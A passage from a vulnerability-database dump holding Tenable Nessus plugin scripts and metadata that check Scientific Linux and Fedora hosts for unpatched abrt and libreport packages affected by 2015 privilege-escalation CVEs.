script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:abrt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:abrt-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:abrt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:abrt-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:abrt-gui-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:abrt-gui-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:abrt-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:abrt-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:abrt-python-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:abrt-retrace-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:abrt-tui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libreport\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libreport-anaconda\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libreport-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libreport-compat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libreport-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libreport-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libreport-filesystem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libreport-gtk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libreport-gtk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libreport-newt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libreport-plugin-bugzilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libreport-plugin-kerneloops\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libreport-plugin-logger\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libreport-plugin-mailx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libreport-plugin-reportuploader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libreport-plugin-rhtsupport\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libreport-plugin-ureport\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libreport-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libreport-rhel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libreport-rhel-anaconda-bugzilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libreport-rhel-bugzilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libreport-web\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libreport-web-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"abrt-2.1.11-22.el7_1\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"abrt-addon-ccpp-2.1.11-22.el7_1\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"abrt-addon-kerneloops-2.1.11-22.el7_1\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"abrt-addon-pstoreoops-2.1.11-22.el7_1\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"abrt-addon-python-2.1.11-22.el7_1\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"abrt-addon-upload-watch-2.1.11-22.el7_1\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"abrt-addon-vmcore-2.1.11-22.el7_1\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"abrt-addon-xorg-2.1.11-22.el7_1\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"abrt-cli-2.1.11-22.el7_1\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"abrt-console-notification-2.1.11-22.el7_1\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"abrt-dbus-2.1.11-22.el7_1\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"abrt-debuginfo-2.1.11-22.el7_1\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"abrt-desktop-2.1.11-22.el7_1\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"abrt-devel-2.1.11-22.el7_1\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"abrt-gui-2.1.11-22.el7_1\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"abrt-gui-devel-2.1.11-22.el7_1\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"abrt-gui-libs-2.1.11-22.el7_1\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"abrt-libs-2.1.11-22.el7_1\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"abrt-python-2.1.11-22.el7_1\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"abrt-python-doc-2.1.11-22.el7_1\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"abrt-retrace-client-2.1.11-22.el7_1\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"abrt-tui-2.1.11-22.el7_1\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libreport-2.1.11-23.sl7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libreport-anaconda-2.1.11-23.sl7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libreport-cli-2.1.11-23.sl7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libreport-compat-2.1.11-23.sl7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libreport-debuginfo-2.1.11-23.sl7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libreport-devel-2.1.11-23.sl7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libreport-filesystem-2.1.11-23.sl7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libreport-gtk-2.1.11-23.sl7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libreport-gtk-devel-2.1.11-23.sl7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libreport-newt-2.1.11-23.sl7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libreport-plugin-bugzilla-2.1.11-23.sl7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libreport-plugin-kerneloops-2.1.11-23.sl7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libreport-plugin-logger-2.1.11-23.sl7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libreport-plugin-mailx-2.1.11-23.sl7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libreport-plugin-reportuploader-2.1.11-23.sl7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libreport-plugin-rhtsupport-2.1.11-23.sl7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libreport-plugin-ureport-2.1.11-23.sl7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libreport-python-2.1.11-23.sl7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libreport-rhel-2.1.11-23.sl7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libreport-rhel-anaconda-bugzilla-2.1.11-23.sl7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libreport-rhel-bugzilla-2.1.11-23.sl7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libreport-web-2.1.11-23.sl7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libreport-web-devel-2.1.11-23.sl7\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"abrt / abrt-addon-ccpp / abrt-addon-kerneloops / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:56:51", "description": "Security fixes for :\n\n - CVE-2015-3315\n\n - CVE-2015-3142\n\n - CVE-2015-1869\n\n - CVE-2015-1870\n\n - CVE-2015-3151\n\n - CVE-2015-3150\n\n - CVE-2015-3159\n\nabrt :\n\n - Move the default dump location from /var/tmp/abrt to /var/spool/abrt\n\n - Use root for owner of all dump directories\n\n - Stop reading hs_error.log from /tmp\n\n - Don not save the system logs by default\n\n - Don not save dmesg if kernel.dmesg_restrict=1\n\nlibreport :\n\n - Harden the code against directory traversal, symbolic and hard link attacks\n\n - Fix a bug causing that the first value of AlwaysExcludedElements was ignored\n\n - Fix missing icon for the 'Stop' button icon name\n\n - Improve development documentation\n\n - Translations updates\n\ngnome-abrt :\n\n - Enabled the Details also for the System problems\n\n - Do not crash in the testing of availabitlity of XServer\n\n - Fix 'Open problem's data directory'\n\n - Quit Application on Ctrl+Q\n\n - Translation updates\n\nsatyr :\n\n - New kernel taint flags\n\n - More secure core stacktraces from core hook\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-06-22T00:00:00", "type": "nessus", "title": "Fedora 22 : abrt-2.6.0-1.fc22 / gnome-abrt-1.2.0-1.fc22 / libreport-2.6.0-1.fc22 / satyr-0.18-1.fc22 (2015-9886)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1869", "CVE-2015-1870", "CVE-2015-3142", "CVE-2015-3150", "CVE-2015-3151", "CVE-2015-3159", "CVE-2015-3315"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:abrt", "p-cpe:/a:fedoraproject:fedora:gnome-abrt", "p-cpe:/a:fedoraproject:fedora:libreport", "p-cpe:/a:fedoraproject:fedora:satyr", "cpe:/o:fedoraproject:fedora:22"], "id": "FEDORA_2015-9886.NASL", "href": "https://www.tenable.com/plugins/nessus/84312", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-9886.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84312);\n script_version(\"2.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-1869\", \"CVE-2015-1870\", \"CVE-2015-3142\", \"CVE-2015-3150\", \"CVE-2015-3151\", \"CVE-2015-3159\", \"CVE-2015-3315\");\n script_xref(name:\"FEDORA\", value:\"2015-9886\");\n\n script_name(english:\"Fedora 22 : abrt-2.6.0-1.fc22 / gnome-abrt-1.2.0-1.fc22 / libreport-2.6.0-1.fc22 / satyr-0.18-1.fc22 (2015-9886)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fixes for :\n\n - CVE-2015-3315\n\n - CVE-2015-3142\n\n - CVE-2015-1869\n\n - CVE-2015-1870\n\n - CVE-2015-3151\n\n - CVE-2015-3150\n\n - CVE-2015-3159\n\nabrt :\n\n - Move the default dump location from /var/tmp/abrt to\n /var/spool/abrt\n\n - Use root for owner of all dump directories\n\n - Stop reading hs_error.log from /tmp\n\n - Don not save the system logs by default\n\n - Don not save dmesg if kernel.dmesg_restrict=1\n\nlibreport :\n\n - Harden the code against directory traversal, symbolic\n and hard link attacks\n\n - Fix a bug causing that the first value of\n AlwaysExcludedElements was ignored\n\n - Fix missing icon for the 'Stop' button icon name\n\n - Improve development documentation\n\n - Translations updates\n\ngnome-abrt :\n\n - Enabled the Details also for the System problems\n\n - Do not crash in the testing of availabitlity of\n XServer\n\n - Fix 'Open problem's data directory'\n\n - Quit Application on Ctrl+Q\n\n - Translation updates\n\nsatyr :\n\n - New kernel taint flags\n\n - More secure core stacktraces from core hook\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1128400\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1212821\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1212865\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1212871\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1214452\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1214609\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1216975\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1218239\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-June/160568.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c64f5b7d\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-June/160569.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b84b95df\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-June/160570.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b449c29f\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-June/160571.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ca41820c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ABRT raceabrt Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:abrt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:gnome-abrt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libreport\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:satyr\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"abrt-2.6.0-1.fc22\")) flag++;\nif (rpm_check(release:\"FC22\", reference:\"gnome-abrt-1.2.0-1.fc22\")) flag++;\nif (rpm_check(release:\"FC22\", reference:\"libreport-2.6.0-1.fc22\")) flag++;\nif (rpm_check(release:\"FC22\", reference:\"satyr-0.18-1.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"abrt / gnome-abrt / libreport / satyr\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:57:22", "description": "Security fixes for :\n\n - CVE-2015-3315\n\n - CVE-2015-3142\n\n - CVE-2015-1869\n\n - CVE-2015-1870\n\n - CVE-2015-3151\n\n - CVE-2015-3150\n\n - CVE-2015-3159\n\nabrt: =====\n\n - Move the default dump location from /var/tmp/abrt to /var/spool/abrt\n\n - Use root for owner of all dump directories\n\n - Stop reading hs_error.log from /tmp\n\n - Don not save the system logs by default\n\n - Don not save dmesg if kernel.dmesg_restrict=1\n\nlibreport: ==========\n\n - Harden the code against directory traversal, symbolic and hard link attacks\n\n - Fix a bug causing that the first value of AlwaysExcludedElements was ignored\n\n - Fix missing icon for the 'Stop' button icon name\n\n - Improve development documentation\n\n - Translations updates\n\ngnome-abrt: ===========\n\n - Use DBus to get problem data for detail dialog\n\n - Fix an error introduced with the details on System page\n\n - Enabled the Details also for the System problems\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-07-01T00:00:00", "type": "nessus", "title": "Fedora 21 : abrt-2.3.0-7.fc21 / gnome-abrt-1.0.0-3.fc21 / libreport-2.3.0-8.fc21 (2015-10193)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1869", "CVE-2015-1870", "CVE-2015-3142", "CVE-2015-3150", "CVE-2015-3151", "CVE-2015-3159", "CVE-2015-3315"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:abrt", "p-cpe:/a:fedoraproject:fedora:gnome-abrt", "p-cpe:/a:fedoraproject:fedora:libreport", "cpe:/o:fedoraproject:fedora:21"], "id": "FEDORA_2015-10193.NASL", "href": "https://www.tenable.com/plugins/nessus/84475", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-10193.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84475);\n script_version(\"2.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-1869\", \"CVE-2015-1870\", \"CVE-2015-3142\", \"CVE-2015-3150\", \"CVE-2015-3151\", \"CVE-2015-3159\", \"CVE-2015-3315\");\n script_xref(name:\"FEDORA\", value:\"2015-10193\");\n\n script_name(english:\"Fedora 21 : abrt-2.3.0-7.fc21 / gnome-abrt-1.0.0-3.fc21 / libreport-2.3.0-8.fc21 (2015-10193)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fixes for :\n\n - CVE-2015-3315\n\n - CVE-2015-3142\n\n - CVE-2015-1869\n\n - CVE-2015-1870\n\n - CVE-2015-3151\n\n - CVE-2015-3150\n\n - CVE-2015-3159\n\nabrt: =====\n\n - Move the default dump location from /var/tmp/abrt to\n /var/spool/abrt\n\n - Use root for owner of all dump directories\n\n - Stop reading hs_error.log from /tmp\n\n - Don not save the system logs by default\n\n - Don not save dmesg if kernel.dmesg_restrict=1\n\nlibreport: ==========\n\n - Harden the code against directory traversal, symbolic\n and hard link attacks\n\n - Fix a bug causing that the first value of\n AlwaysExcludedElements was ignored\n\n - Fix missing icon for the 'Stop' button icon name\n\n - Improve development documentation\n\n - Translations updates\n\ngnome-abrt: ===========\n\n - Use DBus to get problem data for detail dialog\n\n - Fix an error introduced with the details on System\n page\n\n - Enabled the Details also for the System problems\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1169774\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1179752\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1193656\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1212821\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1212865\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1212871\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1213485\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1214452\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1214609\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1216975\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1218239\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=986876\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-June/161245.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9e916c0f\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-June/161246.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d3b69026\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-June/161247.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d7b58c5a\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected abrt, gnome-abrt and / or libreport packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n 